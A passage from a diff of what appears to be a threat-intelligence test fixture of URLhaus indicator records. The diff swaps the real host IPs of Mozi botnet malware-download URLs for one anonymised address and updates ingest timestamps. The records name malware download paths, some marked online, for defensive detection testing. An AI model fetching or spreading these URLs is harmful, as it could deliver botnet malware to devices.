UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28011,18 +28011,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.137.202:55457/Mozi.m", + "original": "http://89.160.20.156:55457/Mozi.m", "scheme": "http", "port": 55457, - "domain": "59.99.137.202", - "full": "http://59.99.137.202:55457/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55457/Mozi.m" }, - "ip": "59.99.137.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694643995Z", - "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://59.99.137.202:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.137.202\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028829900Z", + "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://89.160.20.156:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28060,18 +28060,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.16.213:52314/Mozi.m", + "original": "http://89.160.20.156:52314/Mozi.m", "scheme": "http", "port": 52314, - "domain": "59.93.16.213", - "full": "http://59.93.16.213:52314/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52314/Mozi.m" }, - "ip": "59.93.16.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694647201Z", - "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://59.93.16.213:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.16.213\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028836500Z", + "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://89.160.20.156:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28109,18 +28109,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.56.231:41985/Mozi.m", + "original": "http://89.160.20.156:41985/Mozi.m", "scheme": "http", "port": 41985, - "domain": "42.230.56.231", - "full": "http://42.230.56.231:41985/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41985/Mozi.m" }, - "ip": "42.230.56.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694650527Z", - "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://42.230.56.231:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.56.231\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028843100Z", + "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://89.160.20.156:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28158,18 +28158,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://125.41.97.157:53197/i", + "original": "http://89.160.20.156:53197/i", "scheme": "http", "port": 53197, - "domain": "125.41.97.157", - "full": "http://125.41.97.157:53197/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53197/i" }, - "ip": "125.41.97.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694653974Z", - "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://125.41.97.157:53197/i\",\"url_status\":\"online\",\"host\":\"125.41.97.157\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028849800Z", + "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://89.160.20.156:53197/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28207,18 +28207,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.61.168:54472/Mozi.m", + "original": "http://89.160.20.156:54472/Mozi.m", "scheme": "http", "port": 54472, - "domain": "125.43.61.168", - "full": "http://125.43.61.168:54472/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54472/Mozi.m" }, - "ip": "125.43.61.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694657290Z", - "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://125.43.61.168:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.61.168\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028856400Z", + "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://89.160.20.156:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28256,18 +28256,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.154.101.44:38100/Mozi.m", + "original": "http://89.160.20.156:38100/Mozi.m", "scheme": "http", "port": 38100, - "domain": "219.154.101.44", - "full": "http://219.154.101.44:38100/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38100/Mozi.m" }, - "ip": "219.154.101.44" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694660626Z", - "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://219.154.101.44:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"219.154.101.44\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028863Z", + "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://89.160.20.156:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28305,18 +28305,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://189.51.126.160:33121/Mozi.m", + "original": "http://89.160.20.156:33121/Mozi.m", "scheme": "http", "port": 33121, - "domain": "189.51.126.160", - "full": "http://189.51.126.160:33121/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33121/Mozi.m" }, - "ip": "189.51.126.160" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694663842Z", - "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://189.51.126.160:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.126.160\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028869900Z", + "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://89.160.20.156:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28354,18 +28354,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://14.154.28.65:39363/Mozi.m", + "original": "http://89.160.20.156:39363/Mozi.m", "scheme": "http", "port": 39363, - "domain": "14.154.28.65", - "full": "http://14.154.28.65:39363/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39363/Mozi.m" }, - "ip": "14.154.28.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694667178Z", - "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://14.154.28.65:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"14.154.28.65\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028876600Z", + "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://89.160.20.156:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28403,18 +28403,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.18.6:42844/Mozi.m", + "original": "http://89.160.20.156:42844/Mozi.m", "scheme": "http", "port": 42844, - "domain": "182.119.18.6", - "full": "http://182.119.18.6:42844/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42844/Mozi.m" }, - "ip": "182.119.18.6" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694670374Z", - "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://182.119.18.6:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.18.6\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028883300Z", + "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://89.160.20.156:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28452,18 +28452,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://219.156.209.2:45789/Mozi.a", + "original": "http://89.160.20.156:45789/Mozi.a", "scheme": "http", "port": 45789, - "domain": "219.156.209.2", - "full": "http://219.156.209.2:45789/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45789/Mozi.a" }, - "ip": "219.156.209.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694673340Z", - "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://219.156.209.2:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"219.156.209.2\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028890100Z", + "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://89.160.20.156:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28501,18 +28501,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.15.193.168:34080/Mozi.m", + "original": "http://89.160.20.156:34080/Mozi.m", "scheme": "http", "port": 34080, - "domain": "221.15.193.168", - "full": "http://221.15.193.168:34080/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34080/Mozi.m" }, - "ip": "221.15.193.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694676476Z", - "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://221.15.193.168:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.15.193.168\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028896600Z", + "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://89.160.20.156:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28550,18 +28550,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.161.162:56067/Mozi.m", + "original": "http://89.160.20.156:56067/Mozi.m", "scheme": "http", "port": 56067, - "domain": "117.194.161.162", - "full": "http://117.194.161.162:56067/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56067/Mozi.m" }, - "ip": "117.194.161.162" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694679972Z", - "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://117.194.161.162:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.194.161.162\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028903300Z", + "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://89.160.20.156:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28599,18 +28599,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.215.208.204:34205/Mozi.m", + "original": "http://89.160.20.156:34205/Mozi.m", "scheme": "http", "port": 34205, - "domain": "117.215.208.204", - "full": "http://117.215.208.204:34205/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34205/Mozi.m" }, - "ip": "117.215.208.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694683229Z", - "original": "{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://117.215.208.204:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.215.208.204\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028909900Z", + "original": "{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://89.160.20.156:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28648,18 +28648,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.162.116:53239/Mozi.m", + "original": "http://89.160.20.156:53239/Mozi.m", "scheme": "http", "port": 53239, - "domain": "117.222.162.116", - "full": "http://117.222.162.116:53239/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53239/Mozi.m" }, - "ip": "117.222.162.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694686505Z", - "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://117.222.162.116:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.162.116\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028916600Z", + "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://89.160.20.156:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28697,18 +28697,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.215.209.95:53868/Mozi.m", + "original": "http://89.160.20.156:53868/Mozi.m", "scheme": "http", "port": 53868, - "domain": "117.215.209.95", - "full": "http://117.215.209.95:53868/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53868/Mozi.m" }, - "ip": "117.215.209.95" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694689591Z", - "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://117.215.209.95:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.215.209.95\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028923100Z", + "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://89.160.20.156:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28746,18 +28746,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.75.192.72:39724/Mozi.m", + "original": "http://89.160.20.156:39724/Mozi.m", "scheme": "http", "port": 39724, - "domain": "116.75.192.72", - "full": "http://116.75.192.72:39724/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39724/Mozi.m" }, - "ip": "116.75.192.72" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694692676Z", - "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://116.75.192.72:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.75.192.72\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028929800Z", + "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://89.160.20.156:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28795,18 +28795,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.213.43.181:60804/Mozi.m", + "original": "http://89.160.20.156:60804/Mozi.m", "scheme": "http", "port": 60804, - "domain": "117.213.43.181", - "full": "http://117.213.43.181:60804/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60804/Mozi.m" }, - "ip": "117.213.43.181" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694696363Z", - "original": "{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://117.213.43.181:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.213.43.181\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028936400Z", + "original": "{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://89.160.20.156:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28844,18 +28844,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.5.149.145:51949/Mozi.m", + "original": "http://89.160.20.156:51949/Mozi.m", "scheme": "http", "port": 51949, - "domain": "123.5.149.145", - "full": "http://123.5.149.145:51949/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51949/Mozi.m" }, - "ip": "123.5.149.145" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694699519Z", - "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://123.5.149.145:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.5.149.145\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028943100Z", + "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://89.160.20.156:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28893,18 +28893,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.114.210:48224/Mozi.m", + "original": "http://89.160.20.156:48224/Mozi.m", "scheme": "http", "port": 48224, - "domain": "125.41.114.210", - "full": "http://125.41.114.210:48224/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48224/Mozi.m" }, - "ip": "125.41.114.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694703346Z", - "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://125.41.114.210:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.114.210\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + 